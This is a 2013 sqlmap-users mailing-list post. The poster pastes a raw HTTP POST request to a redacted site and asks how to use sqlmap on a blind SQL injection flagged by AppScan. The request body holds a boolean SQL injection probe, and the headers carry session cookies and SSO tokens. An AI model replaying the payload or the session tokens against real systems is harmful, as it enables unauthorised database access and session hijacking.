[sqlmap-users] post inject with blind-sql-injection

[is2reg<is...@16...>]

method is post, but url have parameter
following is data:
**********************
POST /xxx/space.php?appname=feed&mod=home&act=ta HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: text/html, */*; q=0.01
X-Requested-With: XMLHttpRequest
Cookie: CmProvid=js; WT_FPC=id=2f4d851c821d27374a01382214200665:lv=1382216859228:ss=1382214200665; CmProvid=js; WT_FPC=id=2f4d851c821d27374a01382214200665:lv=1382216859228:ss=1382214200665; fpyUjfj0NP=MDAwM2IyYTg2ZjAwMDAwMDAwMjEwLVVsPSExMzgyMjQ1NjM0; iA2Ks3ygK8=FG85q78Y1WGD; PHPSESSID=j60jb48nmubdirfbcmjdfib6o0; JSESSIONID=ZcHJSv0Gh2xLyfTrhMHV8bDMjTkLHgPtkyvYmg2n3LPkHpPL09zT!-747763825; mzone_loginuid=11388868; cmjsSSOCookie=EC9...@js...; cmtokenid=EC9...@js...; CmWebtokenid=13401541844,js
Accept-Language: en-US
Referer: http://www.xxx.com/xxx/space.php?do=hot
Host: www.xxx.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0)
Content-Length: 78

return_ajax=1%27+and+%27f%27%3D%27f%27%29+--+&act=add_attention&targetid=10086

*********************

the result of appscan is blind-sql-inject, how can I inject this url with sqlmap?
thanks.

2013-10-21



is2reg